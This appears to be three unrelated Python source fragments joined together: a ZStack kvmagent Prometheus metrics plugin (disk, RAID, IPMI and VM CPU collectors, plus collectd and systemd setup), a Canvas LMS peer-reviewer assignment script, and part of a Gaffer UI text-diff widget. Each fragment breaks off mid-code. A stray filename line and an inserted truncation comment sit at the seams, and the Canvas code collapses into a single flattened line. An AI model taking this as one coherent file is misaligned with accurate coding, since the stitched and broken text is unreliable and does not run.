    metrics['host_network_all_out_errors'].add_metric([], float(all_out_errors))

    return metrics.values()


def collect_host_capacity_statistics():
    # sum disk usage (du -bs) over the known ZStack directories
    default_zstack_path = '/usr/local/zstack/apache-tomcat/webapps/zstack'

    zstack_env_path = os.environ.get('ZSTACK_HOME', None)
    if zstack_env_path and zstack_env_path != default_zstack_path:
        default_zstack_path = zstack_env_path

    zstack_dir = ['/var/lib/zstack', '%s/../../../' % default_zstack_path, '/opt/zstack-dvd/',
                  '/var/log/zstack', '/var/lib/mysql', '/var/lib/libvirt', '/tmp/zstack']

    metrics = {
        'zstack_used_capacity_in_bytes': GaugeMetricFamily('zstack_used_capacity_in_bytes',
                                                           'ZStack used capacity in bytes')
    }

    zstack_used_capacity = 0
    for dir in zstack_dir:
        if not os.path.exists(dir):
            continue
        cmd = "du -bs %s | awk {\'print $1\'}" % dir
        res = bash_o(cmd)
        zstack_used_capacity += int(res)

    metrics['zstack_used_capacity_in_bytes'].add_metric([], float(zstack_used_capacity))
    return metrics.values()


def collect_lvm_capacity_statistics():
    # report size/free-space per LVM volume group
    metrics = {
        'vg_size': GaugeMetricFamily('vg_size', 'volume group size', None, ['vg_name']),
        'vg_avail': GaugeMetricFamily('vg_avail', 'volume group and thin pool free size', None, ['vg_name']),
    }

    # if multipath wwids are configured, fail fast when no path is available
    r = bash_r("grep -Ev '^[[:space:]]*#|^[[:space:]]*$' /etc/multipath/wwids")
    if r == 0:
        linux.set_fail_if_no_path()
    r, o, e = bash_roe("vgs --nolocking --noheading -oname")
    if r != 0 or len(o.splitlines()) == 0:
        return metrics.values()

    vg_names = o.splitlines()
    for name in vg_names:
        name = name.strip()
        size, avail = lvm.get_vg_size(name, False)
        metrics['vg_size'].add_metric([name], float(size))
        metrics['vg_avail'].add_metric([name], float(avail))

    return metrics.values()


def convert_raid_state_to_int(state):
    """
    :type state: str
    """
    # 0 = healthy, 5 = degraded, 100 = unknown/other
    state = state.lower()
    if state == "optimal":
        return 0
    elif state == "degraded":
        return 5
    else:
        return 100


def convert_disk_state_to_int(state):
    """
    :type state: str
    """
    # 0 = online/jbod, 5 = rebuilding, 10 = failed, 15 = unconfigured, 100 = other
    state = state.lower()
    if "online" in state or "jobd" in state:
        return 0
    elif "rebuild" in state:
        return 5
    elif "failed" in state:
        return 10
    elif "unconfigured" in state:
        return 15
    else:
        return 100


def collect_raid_state():
    # query MegaRAID (MegaCli64) for logical and physical disk health
    metrics = {
        'raid_state': GaugeMetricFamily('raid_state', 'raid state', None, ['target_id']),
        'physical_disk_state': GaugeMetricFamily('physical_disk_state', 'physical disk state', None,
                                                 ['slot_number', 'disk_group']),
        'physical_disk_temperature': GaugeMetricFamily('physical_disk_temperature',
                                                       'physical disk temperature', None,
                                                       ['slot_number', 'disk_group']),
    }
    if bash_r("/opt/MegaRAID/MegaCli/MegaCli64 -LDInfo -LALL -aAll") != 0:
        return metrics.values()

    raid_info = bash_o("/opt/MegaRAID/MegaCli/MegaCli64 -LDInfo -LALL -aAll | grep -E 'Target Id|State'").strip().splitlines()
    target_id = state = "unknown"
    for info in raid_info:
        if "Target Id" in info:
            target_id = info.strip().strip(")").split(" ")[-1]
        else:
            state = info.strip().split(" ")[-1]
            metrics['raid_state'].add_metric([target_id], convert_raid_state_to_int(state))

    disk_info = bash_o(
        "/opt/MegaRAID/MegaCli/MegaCli64 -PDList -aAll | grep -E 'Slot Number|DiskGroup|Firmware state|Drive Temperature'").strip().splitlines()
    slot_number = state = disk_group = "unknown"
    for info in disk_info:
        if "Slot Number" in info:
            slot_number = info.strip().split(" ")[-1]
        elif "DiskGroup" in info:
            kvs = info.replace("Drive's position: ", "").split(",")
            disk_group = filter(lambda x: "DiskGroup" in x, kvs)[0]
            disk_group = disk_group.split(" ")[-1]
        elif "Drive Temperature" in info:
            temp = info.split(":")[1].split("C")[0]
            metrics['physical_disk_temperature'].add_metric([slot_number, disk_group], int(temp))
        else:
            disk_group = "JBOD" if disk_group == "unknown" and info.count("JBOD") > 0 else disk_group
            disk_group = "unknown" if disk_group is None else disk_group
            state = info.strip().split(":")[-1]
            metrics['physical_disk_state'].add_metric([slot_number, disk_group],
                                                      convert_disk_state_to_int(state))

    return metrics.values()


def collect_equipment_state():
    # power supplies, IPMI reachability and physical NIC link state
    metrics = {
        'power_supply': GaugeMetricFamily('power_supply', 'power supply', None, ['ps_id']),
        'ipmi_status': GaugeMetricFamily('ipmi_status', 'ipmi status', None, []),
        'physical_network_interface': GaugeMetricFamily('physical_network_interface',
                                                        'physical network interface', None,
                                                        ['interface_name', 'speed']),
    }

    r, ps_info = bash_ro("ipmitool sdr type 'power supply'")  # type: (int, str)
    if r == 0:
        for info in ps_info.splitlines():
            info = info.strip()
            ps_id = info.split("|")[0].strip().split(" ")[0]
            health = 10 if "fail" in info.lower() or "lost" in info.lower() else 0
            metrics['power_supply'].add_metric([ps_id], health)

    # non-zero return code of `ipmitool mc info` doubles as the status value
    metrics['ipmi_status'].add_metric([], bash_r("ipmitool mc info"))

    nics = bash_o("find /sys/class/net -type l -not -lname '*virtual*' -printf '%f\\n'").splitlines()
    if len(nics) != 0:
        for nic in nics:
            nic = nic.strip()
            try:
                # NOTE(weiw): sriov nic contains carrier file but can not read
                status = linux.read_file("/sys/class/net/%s/carrier" % nic) == 1
            except Exception as e:
                status = True
            speed = str(get_nic_supported_max_speed(nic))
            metrics['physical_network_interface'].add_metric([nic, speed], status)

    return metrics.values()


def collect_vm_statistics():
    # per-VM CPU usage, matching qemu PIDs to VM uuids
    metrics = {
        'cpu_occupied_by_vm': GaugeMetricFamily('cpu_occupied_by_vm',
                                                'Percentage of CPU used by vm', None, ['vmUuid'])
    }

    r, pid_vm_map_str = bash_ro("ps --no-headers u -C \"%s -name\" | awk '{print $2,$13}'" % QEMU_CMD)
    if r != 0 or len(pid_vm_map_str.splitlines()) == 0:
        return metrics.values()
    pid_vm_map_str = pid_vm_map_str.replace(",debug-threads=on", "").replace("guest=", "")
    '''pid_vm_map_str samples:
    38149 e8e6f27bfb2d47e08c59cbea1d0488c3
    38232 afa02edca7eb4afcb5d2904ac1216eb1
    '''

    pid_vm_map = {}
    for pid_vm in pid_vm_map_str.splitlines():
        arr = pid_vm.split()
        if len(arr) == 2:
            pid_vm_map[arr[0]] = arr[1]

    def collect(vm_pid_arr):
        vm_pid_arr_str = ','.join(vm_pid_arr)

        r, pid_cpu_usages_str = bash_ro("top -b -n 1 -p %s | grep qemu | awk '{print $1,$9}'" % vm_pid_arr_str)
        if r != 0 or len(pid_cpu_usages_str.splitlines()) == 0:
            return

        for pid_cpu_usage in pid_cpu_usages_str.splitlines():
            arr = pid_cpu_usage.split()
            pid = arr[0]
            vm_uuid = pid_vm_map[pid]
            cpu_usage = arr[1]
            metrics['cpu_occupied_by_vm'].add_metric([vm_uuid], float(cpu_usage))

    # query `top` in batches of 10 pids (py2: keys() returns a sliceable list)
    n = 10
    for i in range(0, len(pid_vm_map.keys()), n):
        collect(pid_vm_map.keys()[i:i + n])

    return metrics.values()


collect_node_disk_wwid_last_time = None
collect_node_disk_wwid_last_result = None


def collect_node_disk_wwid():
    global collect_node_disk_wwid_last_time
    global collect_node_disk_wwid_last_result

    # NOTE(weiw): some storage can not afford frequent TUR. ref: ZSTAC-23416
    # so cache the result for 60 seconds
    if collect_node_disk_wwid_last_time is None:
        collect_node_disk_wwid_last_time = time.time()
    elif time.time() - collect_node_disk_wwid_last_time < 60 and collect_node_disk_wwid_last_result is not None:
        return collect_node_disk_wwid_last_result

    metrics = {
        'node_disk_wwid': GaugeMetricFamily('node_disk_wwid', 'node disk wwid', None, ["disk", "wwid"])
    }
    pvs = bash_o("pvs --nolocking --noheading -o pv_name").strip().splitlines()
    for pv in pvs:
        multipath_wwid = None
        if bash_r("dmsetup table %s | grep multipath" % pv) == 0:
            multipath_wwid = bash_o("udevadm info -n %s | grep -E '^S: disk/by-id/dm-uuid' | awk -F '-' '{print $NF}'" % pv).strip()
        disks = linux.get_physical_disk(pv, False)
        for disk in disks:
            disk_name = disk.split("/")[-1].strip()
            wwids = bash_o("udevadm info -n %s | grep -E '^S: disk/by-id' | awk -F '/' '{print $NF}' | grep -v '^lvm-pv' | sort" % disk).strip().splitlines()
            if multipath_wwid is not None:
                wwids.append(multipath_wwid)
            if len(wwids) > 0:
                metrics['node_disk_wwid'].add_metric([disk_name, ";".join([w.strip() for w in wwids])], 1)

    collect_node_disk_wwid_last_result = metrics.values()
    return metrics.values()


kvmagent.register_prometheus_collector(collect_host_network_statistics)
kvmagent.register_prometheus_collector(collect_host_capacity_statistics)
kvmagent.register_prometheus_collector(collect_vm_statistics)
kvmagent.register_prometheus_collector(collect_node_disk_wwid)

# mini-host deployments additionally expose LVM/RAID/equipment metrics
if misc.isMiniHost():
    kvmagent.register_prometheus_collector(collect_lvm_capacity_statistics)
    kvmagent.register_prometheus_collector(collect_raid_state)
    kvmagent.register_prometheus_collector(collect_equipment_state)


class PrometheusPlugin(kvmagent.KvmAgent):

    COLLECTD_PATH = "/prometheus/collectdexporter/start"

    @kvmagent.replyerror
    @in_bash
    def start_prometheus_exporter(self, req):
        @in_bash
        def start_collectd(cmd):
            # render the collectd config and (re)start collectdmon only when
            # the rendered config actually changed
            conf_path = os.path.join(os.path.dirname(cmd.binaryPath), 'collectd.conf')

            # NOTE(review): `interfaces` used below is not defined in the
            # visible code — presumably computed earlier in the enclosing
            # method; confirm against the full file.
            conf = '''Interval {{INTERVAL}}
# version {{VERSION}}
FQDNLookup false

LoadPlugin syslog
LoadPlugin aggregation
LoadPlugin cpu
LoadPlugin disk
LoadPlugin interface
LoadPlugin memory
LoadPlugin network
LoadPlugin virt

<Plugin aggregation>
	<Aggregation>
		#Host "unspecified"
		Plugin "cpu"
		#PluginInstance "unspecified"
		Type "cpu"
		#TypeInstance "unspecified"

		GroupBy "Host"
		GroupBy "TypeInstance"

		CalculateNum false
		CalculateSum false
		CalculateAverage true
		CalculateMinimum false
		CalculateMaximum false
		CalculateStddev false
	</Aggregation>
</Plugin>

<Plugin cpu>
  ReportByCpu true
  ReportByState true
  ValuesPercentage true
</Plugin>

<Plugin disk>
  Disk "/^sd[a-z]$/"
  Disk "/^hd[a-z]$/"
  Disk "/^vd[a-z]$/"
  IgnoreSelected false
</Plugin>

<Plugin "interface">
{% for i in INTERFACES -%}
  Interface "{{i}}"
{% endfor -%}
  IgnoreSelected false
</Plugin>

<Plugin memory>
	ValuesAbsolute true
	ValuesPercentage false
</Plugin>

<Plugin virt>
	Connection "qemu:///system"
	RefreshInterval {{INTERVAL}}
	HostnameFormat name
	PluginInstanceFormat name
	BlockDevice "/:hd[a-z]/"
	IgnoreSelected true
	ExtraStats "vcpu memory"
</Plugin>

<Plugin network>
	Server "localhost" "25826"
</Plugin>

'''

            tmpt = Template(conf)
            conf = tmpt.render({
                'INTERVAL': cmd.interval,
                'INTERFACES': interfaces,
                'VERSION': cmd.version,
            })

            need_restart_collectd = False
            if os.path.exists(conf_path):
                with open(conf_path, 'r') as fd:
                    old_conf = fd.read()

                if old_conf != conf:
                    with open(conf_path, 'w') as fd:
                        fd.write(conf)
                    need_restart_collectd = True
            else:
                with open(conf_path, 'w') as fd:
                    fd.write(conf)
                need_restart_collectd = True

            cpid = linux.find_process_by_command('collectd', [conf_path])
            mpid = linux.find_process_by_command('collectdmon', [conf_path])

            if not cpid:
                bash_errorout('collectdmon -- -C %s' % conf_path)
            else:
                bash_errorout('kill -TERM %s' % cpid)
                if need_restart_collectd:
                    if not mpid:
                        bash_errorout('collectdmon -- -C %s' % conf_path)
                    else:
                        bash_errorout('kill -HUP %s' % mpid)
                else:
                    if not mpid:
                        bash_errorout('collectdmon -- -C %s' % conf_path)

        def run_in_systemd(binPath, args, log):
            # install/refresh a systemd unit for the given exporter binary
            def get_systemd_name(path):
                if "collectd_exporter" in path:
                    return "collectd_exporter"
                elif "node_exporter" in path:
                    return "node_exporter"
                elif "pushgateway" in path:
                    return "pushgateway"

            def reload_and_restart_service(service_name):
                bash_errorout("systemctl daemon-reload && systemctl restart %s.service" % service_name)

            service_name = get_systemd_name(binPath)
            service_path = '/etc/systemd/system/%s.service' % service_name

            service_conf = '''
[Unit]
Description=prometheus %s
After=network.target

[Service]
ExecStart=/bin/sh -c '%s %s > %s 2>&1'
ExecStop=/bin/sh -c 'pkill -TERM -f %s'
Restart=always
RestartSec=30s
[Install]
WantedBy=multi-user.target
''' % (service_name, binPath, args, '/dev/null' if log.endswith('/pushgateway.log') else log, binPath)

            if not os.path.exists(service_path):
                linux.write_file(service_path, service_conf, True)
                os.chmod(service_path, 0644)
                reload_and_restart_service(service_name)
                return

            if linux.read_file(service_path) != service_conf:
                linux.write_file(service_path, service_conf, True)
                logger.info("%s.service conf changed" % service_name)

            os.chmod(service_path, 0644)
            # restart
            # NOTE: the source chunk is truncated here; the remainder of
            # run_in_systemd and the rest of the plugin lie outside this range.
# <filename>assign-random-peer-reviewer-by-section.py<gh_stars>10-100 <- extraction artifact, kept as a comment
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# -*- mode: python; python-indent-offset: 4 -*-
#
# ./assign-random-peer-reviewer-by-section.py course_id new_assignment_id [old_assignment_id ]
#
# This program assigns each user in a course (course_id) with a randomly assigned peer reviewer from within their section for a given assignment (new_assignment).
# Note that this program ignores all sections that do not have a single quote or the word "section" in them.
#
# Note also that there are some permutations that cannot meet the above two conditions and the additional condition of not having a person assigned
# to review two different persons. In this case the program tries with a new starting permutation. It will try up to 99 times before giving
# up doing peer reviewing assignments for this section. I know this is an arbitrary number, but hope that it works in practice.
#
# Example:
# # ./assign-random-peer-reviewer-by-section.py --testing 28715 159758
# ./assign-random-peer-reviewer-by-section.py 28850 160120
#
# ./assign-random-peer-reviewer-by-section.py 28715 159753
#
# <NAME> Jr.
#
# 2021.09.16 based on earlier copy-peer-reviewer-assignments.py program
#

import requests, time
from pprint import pprint
import optparse
import sys
import json
import random

#############################
###### EDIT THIS STUFF ######
#############################

global baseUrl  # the base URL used for access to Canvas
global header   # the header for all HTML requests
global payload  # place to store additionally payload when needed for options to HTML requests

# Based upon the options to the program, initialize the variables used to access Canvas gia HTML requests
def initialize(options):
    global baseUrl, header, payload

    # styled based upon https://martin-thoma.com/configuration-files-in-python/
    if options.config_filename:
        config_file=options.config_filename
    else:
        config_file='config.json'

    try:
        with open(config_file) as json_data_file:
            configuration = json.load(json_data_file)
            access_token=configuration["canvas"]["access_token"]
            if options.containers:
                baseUrl="http://"+configuration["canvas"]["host"]+"/api/v1"
                print("using HTTP for the container environment")
            else:
                baseUrl="https://"+configuration["canvas"]["host"]+"/api/v1"

            header = {'Authorization' : 'Bearer ' + access_token}
            payload = {}
    except:
        # NOTE(review): bare except hides the real failure (bad JSON, missing
        # key, unreadable file) behind one generic message
        print("Unable to open configuration file named {}".format(config_file))
        print("Please create a suitable configuration file, the default name is config.json")
        sys.exit()

##############################################################################
## ONLY update the code below if you are experimenting with other API calls ##
##############################################################################

def summarize_assignments(list_of_assignments):
    # print a {id: name} summary of the given assignment dicts
    summary_of_assignments={}
    for assignm in list_of_assignments:
        summary_of_assignments[assignm['id']]=assignm['name']
    print("summary_of_assignments={}".format(summary_of_assignments))

def list_assignments(course_id):
    # return all assignments of the course, following pagination
    assignments_found_thus_far=[]
    # Use the Canvas API to get the list of assignments for the course
    #GET /api/v1/courses/:course_id/assignments

    url = "{0}/courses/{1}/assignments".format(baseUrl, course_id)
    if Verbose_Flag:
        print("url: {}".format(url))

    r = requests.get(url, headers = header)
    if Verbose_Flag:
        print("result of getting assignments: {}".format(r.text))

    if r.status_code == requests.codes.ok:
        page_response=r.json()

        for p_response in page_response:
            assignments_found_thus_far.append(p_response)

        # the following is needed when the reponse has been paginated
        # i.e., when the response is split into pieces - each returning only some of the list of modules
        # see "Handling Pagination" - Discussion created by <EMAIL> on Apr 27, 2015, https://community.canvaslms.com/thread/1500
        while r.links.get('next', False):
            r = requests.get(r.links['next']['url'], headers=header)
            page_response = r.json()
            for p_response in page_response:
                assignments_found_thus_far.append(p_response)

    return assignments_found_thus_far

def list_peer_reviews(course_id, assignment_id):
    # return all peer-review entries for the assignment, following pagination
    reviews_found_thus_far=[]
    # Use the Canvas API to get the list of peer reviwes for the course
    # GET /api/v1/courses/:course_id/assignments/:assignment_id/peer_reviews

    url = "{0}/courses/{1}/assignments/{2}/peer_reviews".format(baseUrl, course_id, assignment_id)
    if Verbose_Flag:
        print("url: {}".format(url))

    r = requests.get(url, headers = header)
    if Verbose_Flag:
        print("result of getting peer reviews: {}".format(r.text))

    if r.status_code == requests.codes.ok:
        page_response=r.json()

        for p_response in page_response:
            reviews_found_thus_far.append(p_response)

        # the following is needed when the reponse has been paginated
        # i.e., when the response is split into pieces - each returning only some of the list of modules
        # see "Handling Pagination" - Discussion created by <EMAIL> on Apr 27, 2015, https://community.canvaslms.com/thread/1500
        if 'link' in r.headers:
            while r.links.get('next', False):
                r = requests.get(r.links['next']['url'], headers=header)
                page_response = r.json()
                for p_response in page_response:
                    reviews_found_thus_far.append(p_response)

    return reviews_found_thus_far

def submission_for_assignment_by_user(course_id, assignment_id, user_id):
    # return the submission information for a single user's assignment for a specific course as a dict
    #
    # Use the Canvas API to get a user's submission for a course for a specific assignment
    # GET /api/v1/courses/:course_id/assignments/:assignment_id/submissions/:user_id

    url = "{0}/courses/{1}/assignments/{2}/submissions/{3}".format(baseUrl, course_id, assignment_id, user_id)
    if Verbose_Flag:
        print("url: {}".format(url))

    #extra_parameters={'student_ids[]': 'all'}
    #r = requests.get(url, params=extra_parameters, headers = header)
    r = requests.get(url, headers = header)

    if Verbose_Flag:
        print("result of getting submissions: {}".format(r.text))

    if r.status_code == requests.codes.ok:
        page_response=r.json()
        if Verbose_Flag:
            print("page_response: " + str(page_response))
        return page_response
    else:
        return dict()

def assign_peer_reviewer(course_id, assignment_id, user_id, submission_id):
    global Verbose_Flag

    # Use the Canvas API
    #POST /api/v1/courses/:course_id/assignments/:assignment_id/submissions/:submission_id/peer_reviews
    # Request Parameters:
    #Parameter		Type	Description
    # user_id	Required	integer	 user_id to assign as reviewer on this assignment
    #
    # from https://github.com/matematikk-mooc/frontend/blob/master/src/js/api/api.js
    #     createPeerReview: function(courseID, assignmentID, submissionID, userID, callback, error) {
    #   this._post({
    #     "callback": callback,
    #     "error": error,
    #     "uri": "/courses/" + courseID + "/assignments/" + assignmentID + "/submissions/" + submissionID + "/peer_reviews",
    #     "params": { user_id: userID }
    #   });
    # },

    url = "{0}/courses/{1}/assignments/{2}/submissions/{3}/peer_reviews".format(baseUrl, course_id, assignment_id, submission_id)
    if Verbose_Flag:
        print("url: {}".format(url))

    payload={'user_id': user_id}
    r = requests.post(url, headers = header, data=payload)
    if Verbose_Flag:
        # NOTE: the source chunk is truncated mid-statement here; the original
        # continues with: print("result of post assigning ...
        pass
peer reviwer: {}".format(r.text)) if r.status_code == requests.codes.ok: print("result of post assigning peer reviwer: {}".format(r.text)) if r.status_code == requests.codes.ok: page_response=r.json() print("assigned reviewer") return True return False def assign_assessor_as_peer_reviewer(course_id, assignment_id, assessor_id, user_id): submission=submission_for_assignment_by_user(course_id, assignment_id, user_id) if Verbose_Flag: print("submission: {}".format(submission)) if Verbose_Flag: print("user_id: {}".format(submission['user_id'])) if submission['user_id'] == int(user_id): if Verbose_Flag: print("matching submission: {}".format(submission)) output=assign_peer_reviewer(course_id, assignment_id, assessor_id, submission['id']) return output return "no match found" def copy_assigned_peer_reviewers(course_id, old_assignment_id, new_assignment_id): # students=students_in_course(course_id) # for student in students: old_list=list_peer_reviews(course_id, old_assignment_id) if Verbose_Flag: print("old_list: {}".format(old_list)) for previous_peer_assignment in old_list: assessor_id=previous_peer_assignment['assessor_id'] user_id=previous_peer_assignment['user_id'] if Verbose_Flag: print("assessor_id: {}".format(assessor_id)) print("user_id: {}".format(user_id)) assign_assessor_as_peer_reviewer(course_id, new_assignment_id, assessor_id, user_id) new_list=list_peer_reviews(course_id, new_assignment_id) if Verbose_Flag: print("new_list: " + str(new_list)) def section_name_from_section_id(sections_info, section_id): for i in sections_info: if i['id'] == section_id: return i['name'] def sections_in_course(course_id): sections_found_thus_far=[] # Use the Canvas API to get the list of sections for this course #GET /api/v1/courses/:course_id/sections url = "{0}/courses/{1}/sections".format(baseUrl,course_id) if Verbose_Flag: print("url: {}".format(url)) r = requests.get(url, headers = header) if Verbose_Flag: print("result of getting sections: {}".format(r.text)) if 
r.status_code == requests.codes.ok: page_response=r.json() for p_response in page_response: sections_found_thus_far.append(p_response) # the following is needed when the reponse has been paginated # i.e., when the response is split into pieces - each returning only some of the list of modules # see "Handling Pagination" - Discussion created by <EMAIL> on Apr 27, 2015, https://community.canvaslms.com/thread/1500 while r.links.get('next', False): r = requests.get(r.links['next']['url'], headers=header) page_response = r.json() for p_response in page_response: sections_found_thus_far.append(p_response) return sections_found_thus_far def students_in_course(course_id): user_found_thus_far=[] # Use the Canvas API to get the list of users enrolled in this course #GET /api/v1/courses/:course_id/enrollments url = "{0}/courses/{1}/enrollments".format(baseUrl,course_id) if Verbose_Flag: print("url: {}".format(url)) extra_parameters={'per_page': '100', 'type[]': ['StudentEnrollment']} r = requests.get(url, params=extra_parameters, headers = header) if Verbose_Flag: print("result of getting enrollments: {}".format(r.text)) if r.status_code == requests.codes.ok: page_response=r.json() for p_response in page_response: user_found_thus_far.append(p_response) # the following is needed when the reponse has been paginated # i.e., when the response is split into pieces - each returning only some of the list of modules # see "Handling Pagination" - Discussion created by <EMAIL> on Apr 27, 2015, https://community.canvaslms.com/thread/1500 while r.links.get('next', False): r = requests.get(r.links['next']['url'], headers=header) page_response = r.json() for p_response in page_response: user_found_thus_far.append(p_response) return user_found_thus_far def list_groups_in_course(course_id): groups_found_thus_far=[] # Use the Canvas API to get the list of groups for the course # GET /api/v1/courses/:course_id/groups url = "{0}/courses/{1}/groups".format(baseUrl, course_id) if Verbose_Flag: 
print("url: {}".format(url)) r = requests.get(url, headers = header) if Verbose_Flag: print("result of getting groups: {}".format(r.text)) if r.status_code == requests.codes.ok: page_response=r.json() for p_response in page_response: groups_found_thus_far.append(p_response) # the following is needed when the reponse has been paginated # i.e., when the response is split into pieces - each returning only some of the list of modules # see "Handling Pagination" - Discussion created by <EMAIL> on Apr 27, 2015, https://community.canvaslms.com/thread/1500 if 'link' in r.headers: while r.links.get('next', False): r = requests.get(r.links['next']['url'], headers=header) page_response = r.json() for p_response in page_response: groups_found_thus_far.append(p_response) return groups_found_thus_far def members_of_groups(group_id): members_found_thus_far=[] # Use the Canvas API to get the list of members of group # GET /api/v1/groups/:group_id/users url = "{0}/groups/{1}/users".format(baseUrl, group_id) if Verbose_Flag: print("url: {}".format(url)) r = requests.get(url, headers = header) if Verbose_Flag: print("result of getting memebrs of group: {}".format(r.text)) if r.status_code == requests.codes.ok: page_response=r.json() for p_response in page_response: members_found_thus_far.append(p_response) # the following is needed when the reponse has been paginated # i.e., when the response is split into pieces - each returning only some of the list of modules # see "Handling Pagination" - Discussion created by <EMAIL> on Apr
values[1] ) or values[0] != values[1] )

        # a frame is shown only when it has a value; frame 0 is styled as a
        # diff ("gafferDiffA") only when the two values actually differ
        visibilities = [
            len( values ) > 0 and values[0] is not None,
            len( values ) > 1 and values[1] is not None and different
        ]
        for i in range( 0, 2 ) :
            self.frame( i ).setVisible( visibilities[i] )
            cornerWidget = self.getCornerWidget( i )
            if cornerWidget is not None :
                cornerWidget.setVisible( visibilities[i] )

        name = "gafferDiffA" if different else ""
        if name != self.frame( 0 )._qtWidget().objectName() :
            self.frame( 0 )._qtWidget().setObjectName( name )
            self.frame( 0 )._repolish()

## Side-by-side diff widget that renders up to two values as HTML text,
# with per-character/per-cell highlighting of the differences.
# NOTE(review): Python 2 code (uses basestring, xrange, cgi.escape).
class TextDiff( SideBySideDiff ) :

    def __init__( self, highlightDiffs=True, **kw ) :

        SideBySideDiff.__init__( self, **kw )

        self.__connections = []
        for i in range( 0, 2 ) :
            label = GafferUI.Label()
            self.__connections.append( label.buttonPressSignal().connect( Gaffer.WeakMethod( self.__buttonPress ) ) )
            self.__connections.append( label.dragBeginSignal().connect( Gaffer.WeakMethod( self.__dragBegin ) ) )
            self.__connections.append( label.dragEndSignal().connect( Gaffer.WeakMethod( self.__dragEnd ) ) )
            self.frame( i ).setChild( label )

        self.__highlightDiffs = highlightDiffs

    def update( self, values ) :
        # Format the values and push the resulting HTML into the two labels.
        SideBySideDiff.update( self, values )

        self.__values = values

        formattedValues = self.__formatValues( values )
        for i, value in enumerate( formattedValues ) :
            self.frame( i ).getChild().setText( self.__htmlHeader + value + self.__htmlFooter )

    def __formatValues( self, values ) :
        # Dispatch on the type of values[0] to a type-specific formatter,
        # returning a list of HTML strings (one per value).
        if len( values ) == 0 :
            return []
        elif len( values ) == 2 and type( values[0] ) != type( values[1] ) :
            # different types - format each separately
            return self.__formatValues( [ values[0] ] ) + self.__formatValues( [ values[1] ] )
        elif isinstance( values[0], IECore.Data ) and hasattr( values[0], "value" ) :
            return self.__formatValues( [ v.value for v in values ] )
        elif isinstance( values[0], ( IECore.V3f, IECore.V3i, IECore.V2f, IECore.V2i ) ) :
            return self.__formatVectors( values )
        elif isinstance( values[0], ( IECore.M44f, IECore.M44d ) ) :
            return self.__formatMatrices( values )
        elif isinstance( values[0], ( IECore.Box3f, IECore.Box3d, IECore.Box3i, IECore.Box2f, IECore.Box2d, IECore.Box2i ) ) :
            return self.__formatBoxes( values )
        elif isinstance( values[0], ( IECore.Shader, IECore.ObjectVector ) ) :
            return self.__formatShaders( values )
        elif isinstance( values[0], ( float, int ) ) :
            return self.__formatNumbers( values )
        elif isinstance( values[0], basestring ) :
            return self.__formatStrings( [ str( v ) for v in values ] )
        elif isinstance( values[0], IECore.PrimitiveVariable ) :
            return self.__formatPrimitiveVariables( values )
        else :
            # fallback: plain escaped str() representation
            return [ cgi.escape( str( v ) ) for v in values ]

    def __formatVectors( self, vectors ) :

        arrays = [ [ v ] for v in vectors ]
        return self.__formatNumberArrays( arrays )

    def __formatMatrices( self, matrices ) :
        # Expand each matrix into a 2d list of its components.
        arrays = []
        for matrix in matrices :
            array = []
            for i in range( 0, matrix.dimensions()[0] ) :
                array.append( [ matrix[i,j] for j in range( 0, matrix.dimensions()[1] ) ] )
            arrays.append( array )

        return self.__formatNumberArrays( arrays )

    def __formatBoxes( self, boxes ) :

        if any( b.isEmpty() for b in boxes ) :
            # We can't diff empty boxes against non-empty, because they're formatted differently.
            return [ self.__formatBoxes( [ b ] )[0] if not b.isEmpty() else "Empty" for b in boxes ]

        arrays = []
        for box in boxes :
            arrays.append( [ box.min, box.max ] )

        return self.__formatNumberArrays( arrays )

    def __formatNumbers( self, values ) :

        values = self.__numbersToAlignedStrings( values )
        values = self.__highlightFromFirstDifference( values )
        return [ "<pre>" + v + "</pre>" for v in values ]

    def __formatNumberArrays( self, values ) :

        # values is a list of 2d arrays of numbers.
        # stack one atop the other, and then format all
        # the values for each column together, so that they
        # are aligned.

        rows = itertools.chain( *values )
        columns = zip( *(row for row in rows) )
        formattedColumns = [ self.__numbersToAlignedStrings( c ) for c in columns ]

        # transform back into a list of 2d arrays of
        # formatted strings.
        formattedRows = zip( *formattedColumns )
        values = zip( *( [ iter( formattedRows ) ] * len( values[0] ) ) )

        # build the tables. it'd be nice to control cellspacing
        # in the stylesheet, but qt doesn't seem to support that.
        result = [ "<table cellspacing=2>" ] * len( values )
        for row in range( 0, len( values[0] ) ) :
            result = [ r + "<tr>" for r in result ]
            for column in range( 0, len( values[0][row] ) ) :
                cellValues = self.__highlightFromFirstDifference( [ v[row][column] for v in values ] )
                cells = [ "<td><pre>" + v + "</pre></td>" for v in cellValues ]
                for resultIndex, cell in enumerate( cells ) :
                    result[resultIndex] += cell
            result = [ r + "</tr>" for r in result ]
        result = [ r + "</table>" for r in result ]

        return result

    def __formatShaders( self, values ) :
        # Render "nodeName (shaderName)" per shader, colouring the node-name
        # cell with the node's stored colour when available.
        formattedValues = []
        for value in values :
            shader = value[-1] if isinstance( value, IECore.ObjectVector ) else value
            shaderName = shader.name
            nodeName = shader.blindData().get( "gaffer:nodeName", None )

            formattedValue = "<table cellspacing=2><tr>"
            if nodeName is not None :
                nodeColor = shader.blindData().get( "gaffer:nodeColor", None )
                if nodeColor is not None :
                    nodeColor = GafferUI.Widget._qtColor( nodeColor.value ).name()
                else :
                    nodeColor = "#000000"
                formattedValue += "<td bgcolor=%s>%s</td>" % ( nodeColor, cgi.escape( nodeName.value ) )
                formattedValue += "<td>(" + cgi.escape( shaderName ) + ")</td>"
            else :
                formattedValue += "<td>" + cgi.escape( shaderName ) + "</td>"
            formattedValue += "</tr></table>"

            formattedValues.append( formattedValue )

        return formattedValues

    def __formatStrings( self, strings ) :
        # Character-level diff of two strings via difflib, wrapping changed
        # spans in .diffA/.diffB styled <span>s.
        if len( strings ) == 1 or strings[0] == strings[1] or not self.__highlightDiffs :
            return [ cgi.escape( s ) for s in strings ]

        a = strings[0]
        b = strings[1]

        aFormatted = ""
        bFormatted = ""
        for op, a1, a2, b1, b2 in difflib.SequenceMatcher( None, a, b ).get_opcodes() :

            if op == "equal" :
                aFormatted += cgi.escape( a[a1:a2] )
                bFormatted += cgi.escape( b[b1:b2] )
            elif op == "replace" :
                aFormatted += '<span class="diffA">' + cgi.escape( a[a1:a2] ) + "</span>"
                bFormatted += '<span class="diffB">' + cgi.escape( b[b1:b2] ) + "</span>"
            elif op == "delete" :
                aFormatted += '<span class="diffA">' + cgi.escape( a[a1:a2] ) + "</span>"
            elif op == "insert" :
                bFormatted += '<span class="diffB">' + cgi.escape( b[b1:b2] ) + "</span>"

        return [ aFormatted, bFormatted ]

